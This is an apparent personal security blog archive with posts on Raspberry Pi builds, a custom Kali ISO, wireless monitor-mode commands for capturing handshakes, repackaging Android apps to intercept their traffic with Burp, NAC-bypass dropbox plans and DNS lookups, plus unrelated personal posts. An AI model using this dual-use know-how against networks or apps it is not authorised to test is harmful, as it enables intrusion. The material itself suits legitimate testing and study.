Sunday, November 25, 2018

Projects to-do

Pi Bakery - standardized build for default Pis on home network

Pi build instructions for full-on wifi testing tool, including a reproducible build of my current hacking box.



Pi dropbox for 802.1x NAC bypass
Pi dropbox for ssh outbound access

Twitter bot on Pi - ideally one that will receive requests from only me to download specific youtube URLs to the Plex bot, from anywhere. So that I can immediately download music to my Plex server at home.

OpenVAS docker image. Or Bloodhound+Neo4j on docker image.

Learn/play with Kubernetes, Terraform.

Hashcat script - hashcat post.

Re-install everything on my other laptop.


Pi Bakery

As you can see, my posting rate has dramatically dropped off. Part of this is because of a general disenchantment with doing limited-scope pentests against networks that are increasingly well protected. What's the point, say I, of doing a pentest that doesn't permit access to physical workstations or emailing/phishing as part of the assessment? What benefit does a company receive from sitting me down at a network port, watching me fail to get on due to NAC, or, even if I do get on, finding that everything is locked down and no stray ports are open, other than being able to check off that they've done their yearly pentest?

In one week (or rarely two), how do you expect me to assess anything other than a point in time? Am I testing how you look right now? Or do you care more about what happens over time? Will someone slip up? Are effective policies and training in place to prevent mistakes?

Even worse are tests of targets directly, without permitting access to the network on which they sit. The only avenue of attack is finding, or more likely writing, exploits for minor issues and chaining them together. In which case you're only proving why something the company considers a medium risk should be rated higher and fixed. What a load of wasted effort.

Now, since it was pentests that drove my side research, not doing pentests naturally led to flagging research. This, other events aside, led me to understand that relying on work to make me happy, or to drive side research and learning, is not the right path. So now I'm working on separating work and hobbies, general self-improvement, etc., and learning some new things.

Recently I found out the power of a Docker container running OpenVAS, which was super easy to install and run on Kali Linux without having to worry about dependencies. Afterwards I read "The Phoenix Project" and am almost done with the book on which the former was based, namely "The Goal". I've also started reading the DevOps Handbook to get a better grasp on SecDevOps and how to manage/drive change in an organization.

Today I've spent most of a day playing with Pi Bakery to create a standardized Pi image install. Pretty darn useful.

The plan is to eventually create an RPi dropbox for pentests, much later down the line, which should be able to do wifi stuff and/or bypass 802.1x network access level protections.

Update: Here is a standard Pi Bakery recipe in case you want to play with it. It performs the following actions:

1. Add noatime to all the partitions in /etc/fstab to avoid writing to SD Card (prolongs life of SD card)
2. apt-get update
3. install nmap git screen irssi dnsutils vnstat cifsutils
4. remove swap - also prolongs life of card
5. adds one alias command to ~/.bashrc
6. changes timezone to Central
7. Generates locales to US UTF-8 like raspi-config does
8. reboots.

The password will be raspberry123; make sure to change it, and also do a full upgrade.

UPDATE 2: Item 7 above is not working, still working out hijinks.
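The eight steps above as a script, an added example here rather than the Pi Bakery recipe itself. It assumes Raspbian with dphys-swapfile (what Pi Bakery targets), writes the same files raspi-config writes for the timezone and locale steps, and uses a placeholder alias because the recipe doesn't name the one it adds. The file-editing steps are plain functions on text so they can be checked against a scratch copy before touching /etc.

```python
"""Added example (not the Pi Bakery recipe itself): the same eight steps as a
Python script for Raspbian with dphys-swapfile. The alias is a placeholder,
since the recipe does not name the alias it adds."""
import os
import subprocess
import sys


# Step 1: add noatime to the mount options of every entry that lacks it.
# Comments, blank lines and swap entries are left exactly as they are.
def add_noatime(fstab_text):
    out = []
    for line in fstab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or len(fields) < 4:
            out.append(line)
            continue
        opts = fields[3].split(",")
        if fields[2] == "swap" or "noatime" in opts:
            out.append(line)
            continue
        fields[3] = ",".join(opts + ["noatime"])
        out.append("\t".join(fields))
    return "\n".join(out) + "\n"


# Step 5: append a line (the alias) to a file exactly once.
def ensure_line(text, line):
    if line in text.splitlines():
        return text
    sep = "" if not text or text.endswith("\n") else "\n"
    return text + sep + line + "\n"


# Step 7, file part: activate the locale in /etc/locale.gen (uncomment it, or
# add it when absent), which is what raspi-config does before locale-gen runs.
def enable_locale(locale_gen_text, locale="en_US.UTF-8 UTF-8"):
    lines = locale_gen_text.splitlines()
    found = False
    for i, line in enumerate(lines):
        if line.lstrip("# ").strip() == locale:
            lines[i] = locale
            found = True
    if not found:
        lines.append(locale)
    return "\n".join(lines) + "\n"


def rewrite(path, func, *args):
    """Apply one of the text functions above to a file in place."""
    with open(path) as f:
        text = f.read()
    with open(path, "w") as f:
        f.write(func(text, *args))


def run(*cmd):
    subprocess.run(cmd, check=True)


def apply_recipe():
    """Run the whole recipe; must be root on the Pi, ends with a reboot."""
    rewrite("/etc/fstab", add_noatime)                                   # 1
    run("apt-get", "update")                                             # 2
    run("apt-get", "install", "-y", "nmap", "git", "screen", "irssi",    # 3
        "dnsutils", "vnstat", "cifs-utils")  # Debian's package name is cifs-utils
    run("dphys-swapfile", "swapoff")                                     # 4
    run("dphys-swapfile", "uninstall")
    run("systemctl", "disable", "dphys-swapfile")
    rewrite("/home/pi/.bashrc", ensure_line, "alias ll='ls -la'")        # 5 (placeholder alias)
    with open("/etc/timezone", "w") as f:                                # 6, as raspi-config does it
        f.write("America/Chicago\n")
    if os.path.lexists("/etc/localtime"):
        os.remove("/etc/localtime")
    run("dpkg-reconfigure", "-f", "noninteractive", "tzdata")
    rewrite("/etc/locale.gen", enable_locale)                            # 7
    run("locale-gen")
    run("update-locale", "LANG=en_US.UTF-8")
    run("reboot")                                                        # 8


if __name__ == "__main__" and "--apply" in sys.argv:
    apply_recipe()
```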


Wednesday, October 03, 2018

Live Build a Custom Kali ISO

During May and June of 2018, I worked on a really difficult project, namely attempting to create a custom Kali Linux ISO for unattended installation (and Live if necessary). While strictly speaking this is a work-related project, the paucity of working, current guides on the internet led me to believe that people will benefit from a full run-down of how I got an unattended install to work.

Please note - This is a work in progress. As such, there's a lot of things commented out or left in because I worked on an incremental basis. Since this project was several months ago, some of the detailed explanations are unlikely to be completed.


Prelude: I was tasked with creating a custom ISO build of Kali Linux, such that it can be installed on a laptop (presumably using a live USB), or installed on a Virtual Machine. The idea is that you plug in the USB and boot from it, select “Automated Install” for instance, and have a complete install be performed on your behalf with the least amount of interaction possible.

I was directed to a link such as this one: https://docs.kali.org/development/live-build-a-custom-kali-iso. As you can see, a custom script and folder structure for a live build can be obtained from git://git.kali.org/live-build-config.git. It’s based on Debian’s own Live Build command, but makes things comparatively simpler for the end user, e.g. all you, the user, need to do is run “./build.sh --verbose”.

However, all of the documentation I found on using the Kali Live Build script was outdated, incomplete, or simply wrong, and wasted many hours of my time. Most of Debian’s documentation is only helpful for minutiae.
Examples:
https://docs.kali.org/development/live-build-a-custom-kali-iso - Cursory information, no details
https://docs.kali.org/kali-dojo/02-mastering-live-build - the one line about adding a preseed file to an arbitrary “debian-installer” folder that is not used anywhere within the build script threw me way off. Even if you follow this guide you won’t get a working unattended install.
https://www.offensive-security.com/kali-linux/kali-rolling-iso-of-doom/ - the preseed has errors and will not perform an unattended install.
https://kali.training/topic/building-custom-kali-live-iso-images/ - Most useful, but still not enough information about how to create a valid preseed file or what live build hooks really do.

So, through many hours of trial and error, I came up with a build process that reliably works for VMware. This may not work for Virtualbox.

Google Docs Link here

Maybe later I will upload a ready-to-go live build version to my site and provide a link.

Thursday, September 27, 2018

Warning: Politics

Thanks, former colleague and friend on Facebook, you say it better than I've heard in a while:

and I had a long talk last night where I brought evidence to many claims he made. When presented with facts, he demanded respect for his system of beliefs in exchange for him respecting mine. Although I appreciate the sentiment, this isn't a give and take for me. This conversation made me lose all respect for this former friend, and I do not wish to surround myself with people of his system of belief. This is deeper than politics, it's about what you stand for. If you idolize someone that is a collective symbol of hatred, racism, misogyny, anti-intellectualism, cowardice, extreme hubris, there is no room for you in my life and I'm drawing the line there. I don't care if you're a democrat, republican, conservative, liberal, identify as an asexual dial up modem internet connected toaster, or (in this case) if we were childhood/highschool/college friends. If you reject facts and evidence, it's time for the story of our connection to come to an end. I'm proud to be a Texan and proud to be an example that not all of us are the stereotypical dimwitted racist simpletons that are too often propagated in the news to the rest of the world.

Monday, July 16, 2018

Back to basics

For some time I've felt the need to review my information gathering and discovery skills. With many IT shops now doing regular vulnerability scanning, it's a lot harder to use Nessus as a jumping-off point for a (glorified) pentest. Instead I'd prefer to use other things: surreptitious port scans, network-related vulnerabilities, even printer exploitation. The latter is an area I'd long avoided, as hitting printers could cause DoS conditions, but one I'm learning more about as of late.

One good thing might be to finally go through the list of Kali Linux tools and try each one out during a pentest. This would be hands-on-keyboard experience and would be very useful. Sometimes I browse a bit and quickly discover items that could be handy.

Sunday, July 08, 2018

Raga time-of-day player - long term project

SqueezeLite/SqueezePlay

https://discourse.mopidy.com/t/playing-schedule-for-pi-muscbox/1107

https://docs.mopidy.com/en/latest/ext/local/

http://www.gerrelt.nl/RaspberryPi/wordpress/tutorial-installing-squeezelite-player-on-raspbian/


http://www.parrikar.org/

http://raspberry-at-home.com/logitech-media-server/



I compiled these links back in November of 2017. For approximately a year I've had the idea of creating a raga time-of-day player with a Raspberry Pi Zero.

The original idea was to have some sort of set-up, similar to Plex Media Server, where if you visit a URL music will be playing automatically (like a radio station) with a selection of Hindustani ragas appropriate for the specific time of day.

After spending a couple of days struggling with the software implementation, using Mopidy or Squeezelite or Icecast, I realized that it's a lot harder than it looks. With time, the idea evolved to a focus on actually learning basic theory for Hindustani Classical Music. That's a good starting point and one I'm currently slowly pursuing.

Here's the project broken down into parts:

1. Hardware - Raspberry Pi Zero with youtube-dl to download music, and a 128 GB micro-SD Card.
2. Software - Pi MusicBox, mopidy, Icecast, Plex, SqueezeLite, all are options.
3. Scripts. Either:

  • Create a script to generate playlists with an approximate run-time of 24 hours, by selecting mp3 files from appropriate directories and creating m3u playlists from these
    • can be shorter than 24 hours as I'm unlikely to be listening to raga music in the 4th prahar of the night (3 AM to 6 AM)
  • Set up an actual radio station
  • Import filenames into a SQLite database to help with song selection?
  • Find software that can recognize length in time of tracks
4. Play music according to the right time. One system for classifying ragas (other two are scales and raga/ragini) involves playing them at the right time of day/night/season.
5. Collect music tracks from youtube and categorize them appropriately, or create a script that searches the filename and categorizes them automatically according to some rules, or adds id3 tags accordingly...
6. Learn the theory so you can actually know what's going on. This is actually rather difficult, as there's a lot of terminology and lots of variation between schools of playing. In fact, even the time classification underpinning this project is subject to differences of opinion. For instance, Raga Shree is classified as either an evening raga or a raga of the 4th section of the day (prahar - 3 PM to 6 PM), but is traditionally played at sunset, which is either in the 4th prahar or the late part of the 5th prahar depending on the time of year and DST.


So you see there's a lot of moving parts. 
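Items 3 and 4 of the plan as a script, an added example that is not the author's code: a prahar lookup using the boundaries given above (day prahars from 6 AM, night prahars from 6 PM, three hours each) and a playlist builder that writes an extended m3u covering the next 24 hours, skipping the 4th prahar of the night as suggested. The track catalogue, its directory layout and the raga-to-prahar tags are constructed for the illustration; on the Pi the catalogue would come from walking the music folders.

```python
"""Added example, not the author's script: time-of-day (prahar) lookup and a
24-hour m3u playlist builder for the raga player. The catalogue is a constructed
stand-in for a directory walk over the Pi's music folders."""
from datetime import datetime, timedelta


def prahar(hour):
    """Map an hour (0-23) to ('day', 1-4) or ('night', 1-4).
    Day prahars run 6-9, 9-12, 12-15, 15-18; night prahars 18-21, 21-24, 0-3, 3-6.
    That puts the 4th prahar of the day at 3-6 PM and the 4th of the night at 3-6 AM."""
    if not 0 <= hour < 24:
        raise ValueError("hour must be 0-23")
    if 6 <= hour < 18:
        return "day", (hour - 6) // 3 + 1
    return "night", ((hour - 18) % 24) // 3 + 1


# Constructed catalogue: path, title, length in seconds, and the prahar the track is
# filed under (a rough traditional assignment for the demo, not a musicological claim).
TRACKS = [
    {"path": "ragas/day/1/bhairav.mp3", "title": "Bhairav", "seconds": 1800, "period": "day", "prahar": 1},
    {"path": "ragas/day/2/todi.mp3", "title": "Todi", "seconds": 2400, "period": "day", "prahar": 2},
    {"path": "ragas/day/3/sarang.mp3", "title": "Sarang", "seconds": 3600, "period": "day", "prahar": 3},
    {"path": "ragas/day/4/shree.mp3", "title": "Shree", "seconds": 2700, "period": "day", "prahar": 4},
    {"path": "ragas/night/1/yaman.mp3", "title": "Yaman", "seconds": 3000, "period": "night", "prahar": 1},
    {"path": "ragas/night/2/bageshri.mp3", "title": "Bageshri", "seconds": 2100, "period": "night", "prahar": 2},
    {"path": "ragas/night/3/malkauns.mp3", "title": "Malkauns", "seconds": 3300, "period": "night", "prahar": 3},
]


def next_prahar_boundary(when):
    """First moment after `when` at which a new three-hour prahar begins."""
    top = when.replace(minute=0, second=0, microsecond=0)
    return top + timedelta(hours=3 - when.hour % 3)


def build_playlist(tracks, start, hours=24, skip=(("night", 4),)):
    """Return extended-m3u text covering `hours` from `start`. Each track is picked
    from the bucket matching the wall-clock prahar at which it would start playing;
    buckets are walked round-robin so a prahar with several tracks cycles through them.
    Prahars listed in `skip`, or with no tracks, are jumped over to the next boundary."""
    buckets = {}
    for t in tracks:
        if t["seconds"] > 0:  # a zero-length track would never advance the clock
            buckets.setdefault((t["period"], t["prahar"]), []).append(t)
    position = {k: 0 for k in buckets}
    lines = ["#EXTM3U"]
    cursor, end = start, start + timedelta(hours=hours)
    while cursor < end:
        key = prahar(cursor.hour)
        bucket = buckets.get(key)
        if key in skip or not bucket:
            cursor = next_prahar_boundary(cursor)
            continue
        track = bucket[position[key] % len(bucket)]
        position[key] += 1
        lines.append(f"#EXTINF:{track['seconds']},{track['title']}")
        lines.append(track["path"])
        cursor += timedelta(seconds=track["seconds"])
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    now = datetime.now().replace(minute=0, second=0, microsecond=0)
    print(build_playlist(TRACKS, now), end="")
```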

Toorcamp reflections

Leaving Toorcamp, I felt conflicting emotions. These developed further after some thoughts and while compiling the Toorcamp presentations.

1. I could have spent more time getting to know the people at my campsite (Camp for Misfit Toys). It was a last-minute campsite for people who didn't know anyone else, who most frequently were at their first Toorcamp. And they were all interesting and unique people. However, in my rush to see everything at Toorcamp I didn't get to know them well.

2. Last Toorcamp I focused on talking to many people (without personal projects to work on). I remembered only a few after the camp was over. This time I focused on personal projects, like soldering a TV-B-Gone, and trying some other things, and less on talking to people. While these are different approaches, what's left with me after Toorcamp is mostly what I learned from talking to other people, such as what projects they were working on (related notes and keywords of which I saved on my phone for later). This is probably the most useful.

3. I spent too much time more drunk than preferred. Several of my phone notes are from times I don't remember from some sort of combination of cider (cider lovers rejoiced at the grocery in Eastsound due to its flabbergasting collection of the stuff) and other beers (but I can't deny that Pike Monk's Uncle Tripel Ale (purple can) was fantastic and enhanced the experience). I feel like I lost the chance to connect with people more deeply due to being forgetful while tipsy.

On the plus side the lighting effects the Toorcamp team placed to light up the night sky and dark trees were gorgeous and once brought me vividly back to the pine trees of Rome.

Courtesy of @macklikeaduck

As in the resolutions in the 2016 presentation, here are some new ones for the next two years (and my phone notes):

1. Really start soldering. I'll get a desk, a soldering iron, a fume extractor, and a workspace to hold components, and finally start soldering kits and learn how to use a breadboard and wires.
2. Actually take the radio ham exam. Tried the week after Toorcamp but the contact was not amenable so I'll set up to take it elsewhere. June 2018 was the last month before a different version of the exam comes into use, so I'll study that guide instead.
3. Hardware hacking?
4. Cyberchef
5. DeviantOllam's CarolinaCon talk about Liquor
6. DJ lobsterdust
7. Jim's famous hackerbourbon list
8. Johann Sebastian Joust (kinda stupid though)
9. Milky Tracker, protracker for amiga (tried but failed, now to get a VM of an amiga)
10. NodeMCU esp-12e module
11. Security+
12. Quantize playing (?)
13. Script to automate getting a ticket on Orcas Island Ferry website. Check for tickets not open for reservation vs yes (this one came to me while pretty high).
14. Strapbook
15. Trash-grass
16. Play with WS2812B LED individually-addressable strips.

Resolutions for Toorcamp 2020 (if I wind up going):

1. This time, actually take a car, by ferry, to the island. It makes life a lot more convenient. For instance, with a rental car I won't need to waste most of an afternoon hitchhiking to the grocery to pick up victuals.
2. Come with a girlfriend or wife? Anything can happen in 2 years... :)

Mount a remote directory using sshfs

How did I not know about this all this time???

https://debmintux.wordpress.com/2010/04/25/mount-a-remote-directory-with-sshfs/

Now I can do music file management via a graphical interface versus cp / mv in command line.

Monday, July 02, 2018

Post-Toorcamp Presentation (2018)

As in 2016, I've created a presentation that makes an attempt at capturing the magic of Toorcamp with slides and pictures of everything I saw (and missed) at Toorcamp. Although this powerpoint was originally created with embedded videos, these ballooned the size to nearly half a GB, so there will be two presentations - one with videos, and one without 'em.

Unlike in 2016, this one will not be on Slideshare as pictures were used mostly without attribution.

If attribution is requested, attribution will be added.

Slides here without video

Update: Slides with video, as presented at HAHA

Monday, June 25, 2018

Post Toorcamp packing analysis

Got back from Toorcamp yesterday. It was certainly interesting. This year I focused on making things (soldering for instance), so there was less opportunity to meet new people.

Here's a quick brain dump mostly for me on what was useful to pack and what was not. Once again, there was a cold night (Saturday) when the temperature dropped to 48 degrees F, and I wasn't quite ready for that.

Scarf: Made life much more bearable. Probably the single one thing that really made everything much better. I wore it all the time except while sleeping and from about 11 AM to 4 PM.

REI shirts from my Europe and Italy trips: Great as before, no sweating.

All my Raspberry Pi Projects: Didn't even touch them. There's just too much to do and see at Toorcamp.

A gaggle of cables and 10/100 5-port switch: Unnecessary.

Rope: No trees, not useful for keeping animals away.

Scent-proof Ziploc bags: Much more useful, no animal issues (unlike the tent next door, used to store food, which was torn apart at odd hours of the night by a large raccoon).

LUCI lights: Lux variety much better than the clear ones. Fantastic for ambient lighting on a table with a group of people, which was my situation. 

Solar-powered LED lights: Wonderful. I didn't realize till after receiving it that it was 66 feet long. This was enough to cover a 10x10 canopy all around plus extra, and it stayed on for hours. Several people commented on how nice it was.

Spare disposable batteries: Not necessary.

SDR and antenna: didn't get to use it, probably not necessary.

Poncho: Used once, maybe an umbrella would make more sense.

Sweater purchased in Prague: Very useful.

All the extension cords: Yes.

Reusable shopping bag: Definitely useful. Too bad I didn't get to drink all the cider I bought.

Instant Oatmeal, many tea bags, kosher beef jerky, instant potatoes, challah bread: Eh.... The challah bread went stale, the kitchen was too far away for tea, and the rest wasn't really necessary since I hitchhiked to the store on the island and picked up more than enough canned food.

On that note, curried lentil canned soup: Absolutely not a good idea in a camping situation. Contrary to traveling for work when occasionally limited food situations can arise, extra fiber isn't good when 500 other people need to use a limited number of restrooms on a continual basis (especially if a nearby campsite decides to have free bar evenings from 8 PM until "the lights are turned off").

Shabbos goy shirt: Limited value this time.

For next time:

Sunscreen: Although I'd packed it, I was afraid of running out, needlessly. It would have been smart to bring maybe an extra tube, as everyone got burned the first day. For me, badly burned on my nose.

Piratebox: bigger capacity, enable upload functionality. I made do with an AC750 travel router or a portable external drive instead.

Car: Driving to camp will make life much easier, plus I can clean up if needed.


Wednesday, June 06, 2018

Blackhat Talks to look forward to

The schedule for Blackhat 18 talks has been released here: https://www.blackhat.com/us-18/briefings.html

Looking forward to the following:

A Dive in to Hyper-V Architecture & Vulnerabilities (Could be useful, VMs are everywhere)
AI & ML in Cyber Security - Why Algorithms are Dangerous
An Attacker Looks at Docker: Approaching Multi-Container Applications
Applied Self-Driving Car Security (the original car hackers strike back)
Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies
Automated Discovery of Deserialization Gadget Chains (making deserialization vulnerability exploitation easier? yes please)
Blockchain Autopsies - Analyzing Ethereum Smart Contract Deaths (I like sci-fi)
Breaking the IIoT: Hacking industrial Control Gateways
Catch me Yes we can! – Pwning Social Engineers using Natural Language Processing Techniques in Real-Time
Deep Neural Networks for Hackers: Methods Applications and Open Source Tools
Don't @ Me: Hunting Twitter Bots at Scale
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking
Exposing the Bait: A Qualitative Look at the Impact of Autonomous Peer Communication to Enhance Organizational Phishing Detection
For the Love of Money: Finding and Exploiting Vulnerabilities in Mobile Point of Sales Systems
From Bot to Robot: How Abilities and Law Change with Physicality
From Workstation to Domain Admin: Why Secure Administration isn't Secure and How to Fix it
Identity Theft: Attacks on SSO Systems
Is the Mafia Taking Over Cybercrime? (tie into the recently-released Web of Profit study)
Last Call for SATCOM Security (see this article for a preview)
Meltdown: Basics Details Consequences
Open Sesame: Picking Locks with Cortana
Outsmarting the Smart City
Over-the-Air: How we Remotely Compromised the Gateway BCM and Autopilot ECUs of Tesla Cars
Practical Web Cache Poisoning: Redefining 'Unexploitable' (from Burp Suite extraordinaire himself)
Screaming Channels: Extracting Bluetooth and WiFi Keys from Radio Noise
SirenJack: Cracking a 'Secure' Emergency Warning Siren System
So I became a Domain Controller (from authors of mimikatz)
The Air-Gap Jumpers
The Science of Hiring and Retaining Female Cybersecurity Engineers
The Unbearable Lightness of BMC's
The Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet
TRITON: How it Disrupted Safety Systems and Changed the Threat Landscape of Industrial Control Systems Forever (I read the PDF but having it explained would be great)

 

Tuesday, May 22, 2018

Parsing .Nessus files - Part 3-ish

Today I'm finally getting around to re-packaging Melcara's script to include the latest version released in September 2017. I'll also need to make the new changes to the perl script (which I foolishly did not save from prior changes).

So:

cpan install XML::TreePP Data::Dumper Math::Round Excel::Writer::XLSX Excel::Writer::XLSX::Chart Data::Table Getopt::Std Net::IP pp

Perl file changes (changed here, can be used to generate report in linux assuming you have all the right libraries):

1. Include "use Net::IP;" at top.
2. Re-order sections to write excel sheets at bottom to "Summary", Criticals, Highs, Mediums, Lows, Informational, Vulnerability to IP Summary.
3. Add block to sort IPs in that last sheet before writing them out.

Install Strawberry Perl Portable in Windows, then through trial-and-error install the modules needed to get pp to work. Pray that something works. But it never did and I gave up after six hours of frustration.

pp -M JSON -M PAR::Dist -M URI::Escape -M LWP::UserAgent -M HTTP::Cookies -M Data::Dump -M Data::Dumper -M XML::Hash::XS -M XML::TreePP -M MIME::Base64 -M Math::Round -M Excel::Writer::XLSX -M Excel::Writer::XLSX::Chart -M Excel::Writer::XLSX::Chart::Pie -M Data::Table -M Getopt::Std -M Net::IP parse_nessus_xml.v24.pl

Note: some of these libraries may not be needed anymore but it worked last time and extra bits don't hurt in this case.

Dpkg::Options note

When installing linux upgrades check this page for references on how to let apt upgrade do its own thing with new/old/updated configuration files:

https://raphaelhertzog.com/2010/09/21/debian-conffile-configuration-file-managed-by-dpkg/

Sunday, May 06, 2018

Quick review of Alfa AWUS036AC (or AC1200?)

Some time in March I read this article, which has a great run-down on the state of 5 GHz packet injection in Kali Linux and the most capable wireless cards. I got all excited and attempted to order the AC1200 without carefully examining the provider. Instead I got the device pictured on Amazon, but it says AWUS036AC on the back.

Oh well. Driver support out of the box is flaky and airmon-ng doesn't play well with it even with the proper drivers installed.

apt install dkms realtek-rtl88xxau-dkms


Then, to put the card into monitor mode, perform the following set of commands each time:

ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up

To take it out of monitor mode (very important) before unplugging:

ip link set wlan1 down
iw dev wlan1 set type managed
ip link set wlan1 up

So those are the cons.

Pros: Great reception of nearby access points. Where before I could barely manage 56 for the closest APs, now it shows as mid-30s. This makes capturing handshakes potentially much easier. As it is, most likely that's what I'll use this device for.

Tuesday, May 01, 2018

CISSP Training

I'm at a company event doing CISSP training, ready to bite the bullet and schedule the exam in June, either before or after Toorcamp. Currently we're going over a somewhat familiar domain involving cryptography, so I'm reading a lot of Feedly and tweets using Tweetdeck.

https://khanism.org/society/how-social-media-destroyed-my-generation/

Not terribly convinced by this post's hyperbole; to be fair the author isn't so sure himself anymore.

https://www.npr.org/sections/thetwo-way/2018/05/01/607054795/nra-bans-guns-during-convention-speech-by-president-vice-president

This is literally a non-issue. The President and Vice President are speaking, the last thing the Secret Service wants is guns not in their hands in the same room or hall as the colloquial "45" and Co. I might dislike Trump intensely but still understand that security protocols have to be followed everywhere, regardless of the supporting stance of the organization under whose auspices they are there. If they were talking at a pen-knife convention would people be up in arms if pocket-knives were banned? Maybe if pocket-knives were used as weapons of mass destruction and killings? Something smells fishy.

Tuesday, April 17, 2018

Getting Burp interception to work in Android Nougat - April 2018

Apparently, it's gotten much harder to intercept mobile app traffic with Burp since my last work a year ago, so guides like this one from Portswigger no longer work. This is detailed in a great guide here:

https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/

"Starting with Nougat, Android changed the default behavior of trusting user installed certificates. It's no longer possible to just install the Burp CA from the sdcard to start intercepting app traffic. Unless otherwise specified, apps will now only trust system level CAs. The failure happens "invisibly" and is responsible for all the alerts I saw in Burp Suite."

I followed the guide in this article (using a Windows 7 machine), choosing to unpack the apk with apktool as my new Pixel 2 is not rooted, but ran into a bunch of issues:

1. Unpacking the apk required using an older version of apktool (2.2.2).
2. Re-packing the apk required using the latest version of apktool (2.3.1 at the time of this writing), but only after following the procedure outlined in this bug report (running apktool empty-framework-dir).
3. Installing OpenJDK 8 to get keytool.exe and jarsigner.exe.
4. Opening the Command Line Interface (cmd) as administrator to run the jarsigner tool.
5. Install AndroZip on the phone to access the destination folder for the new apk file and install it from there, to get the prompt to install untrusted apps.


Another resource: https://serializethoughts.com/2016/09/10/905/

Update 5-1: This wound up not working for the app I was using. Instead I used an app called Packet Capture to look at the packets on the phone directly.

Friday, March 30, 2018

Hashcat GPU benchmarks

Tired of incessant Googling for the same benchmarks, I compiled a spreadsheet of benchmarks (various versions of Hashcat) for Nvidia's GTX 9xx and 10xx series of GPUs.

Note that Hashcat versions 3.20 and later are generally much better than previous versions. Some of the benchmarks I found for older cards were for those older versions, and the results might be higher with newer versions of Hashcat.


Tuesday, March 27, 2018

Random thoughts

I've somewhat soured with time on Twitter as a platform for thoughts/tweets. This Twitter thread is a good example of how not to provide interesting information in article form:

  • Unnecessary background of Twitter user's profile
  • Lede with bigger font
  • Distracting retweets and likes after each 240-character text block
  • Way too much extra stuff for each comment (actual comment text highlighted).


If you want to have photographs along with itty bitty blurbs of your subject, then use an appropriate format: e.g. EnglishRussia or LiveJournal travelogues.


*******************************

The whole discussion about UBI is useful, but (without any sources) I wonder why the argument "people will have more time to focus on their passions" is frequently trotted out. I think it's fair to say that most people aren't terribly self-propelled and might just vegetate all day in front of the TV or play computer games forever. Of course new jobs might be developed to help manage the host of issues that crop up when you sit all day, but is that something we will only have to acknowledge when it happens?


******************************

The Facebook thing going on brings to mind again how easy it is to exploit the vast quantity of information to be evil, so much that I'm surprised it doesn't happen more frequently. Perhaps it's because Opsec is hard, or because the thinking is easy but implementation is harder. So many people don't use ad blockers, or go through life with low IQ or lack of critical thinking skills to identify when they are being duped, or give apps any permissions necessary. Non-compliance with the law is not an issue if you don't get caught, and aside from getting prosecuted on an individual scale, lawsuits against companies take so long that you can continue predatory practices so long as a ruling hasn't happened.

Once you dispel the notion that a product has to follow all the rules of government regulations, ethics, normal human politeness, etc, then it's very easy to decide to exploit human weaknesses for your own purposes, whether it be marketing, advertisement, or whatever (see social engineering and OSINT). 

“If you know the personality of the people you’re targeting, you can nuance your messaging to resonate more effectively with those key audience groups”
Alexander Nix, Cambridge Analytica
So strictly speaking CA did nothing wrong. Who knew that it would take the election of the wrong person for the media to notice it? CA is the logical conclusion of the ability to weaponize ubiquitous ad networks, coupled with Facebook's targeted advertising, and probably a bit of de-anonymizing as well.

***********************************

With all the reading I'm doing thanks to the plane's holding pattern, I'm getting lots of new thoughts. Currently musing while reading this interesting presentation from Defcon 25 (August 2017) about weaponizing ads and propaganda. If politics / targeted advertising / Facebook / all that is so bad, wrecks your ability to do math (see here, page 14, Discussion section), then why not disengage? You'll only wind up smarter than everyone who engages, and possibly more employable in the near future when the unholy combination of gig economies, loss of welfare programs, wealth inequality, long squeeze of climate change, and pending automation via neural networks, all combine to make a lot of people become unemployable.

Wednesday, March 21, 2018

DNS Tunneling walk-through

DNS is a rather complicated system for resolving human-readable names into IP addresses and vice versa. There are any number of guides online for understanding and implementing DNS, but the average user will only see it in the following form:


The reason DNS is actually quite complicated can be figured out from the Wikipedia article linked above, or by looking at the steps involved above. That's a lot of hops and different potential computers to query just to get to google.com. In fact, before step 3 above there can be another step if your computer is in a complicated network, such as at a corporate office location, where a local DNS server is queried first before going out onto the web:


Please read the following presentation I found, especially on slide 11 which illustrates the arrows in the image above.

It helped me to think of DNS as parts of a system rather than a whole, e.g. it's a "decentralized naming system for computers, services, or other resources connected to the Internet or a private network". To help make the Internet work, various "authoritative" servers have some version of this naming system installed, and respond to DNS "queries" to translate websites names to IP addresses for your web browser to understand. Since it's just a naming system, there's any number of DNS programs, and even your own computer can function as part of this, such as being a local DNS server.

Here's a query we can go over from my home network, which isn't a perfect environment, as a recent network/router upgrade plus use of a secondary DNS server has created hard-to-diagnose DNS issues. We're going to use the "nslookup" tool to resolve "www.yosefkerzner.com".



Now, because I like to get to the deep levels of how things work, let's start from the top, or bottom as it were.

1. The computer issuing the request has received a local IP of 192.168.3.107 from the router via DHCP. DHCP is a way of handing out IP addresses dynamically.


Along with this IP, the router told the computer to use 192.168.3.102 as the local DNS server. This IP address, with a hostname of pihole, hosts just that, the Pi-Hole network ad blocker. Along with interesting ad-blocking effects, websites can load faster thanks to some extra caching. So the nslookup tool first outputs just that information.

Then a DNS query is issued to the Pi-Hole:





Next, the pihole refers to the "upstream" DNS settings in its configuration, and finds that the upstream DNS settings have the Google DNS servers of 8.8.8.8 and 8.8.4.4. For some reason two DNS queries for the A record are made (this is strange and I don't know why it happens):



While looking for the A resource record, the Google DNS server discovers a CNAME resource record saying that "www.yosefkerzner.com" is an alias for "yosefkerzner.com", so it re-initiates the query using "yosefkerzner.com".  It finds an A record for "yosefkerzner.com" with the matching IP address of 75.98.175.85, and returns that information to the pihole.

This then gets passed back to the original computer:




I'm not getting into the existing NS records for this domain and what role they play in the resolving process, and also not discussing resolving 75.98.175.85 back to a name (reverse DNS), as this currently isn't working for a reason I'll have to investigate, but probably has to do with the domain being hosted on A2Hosting, not a standalone server.

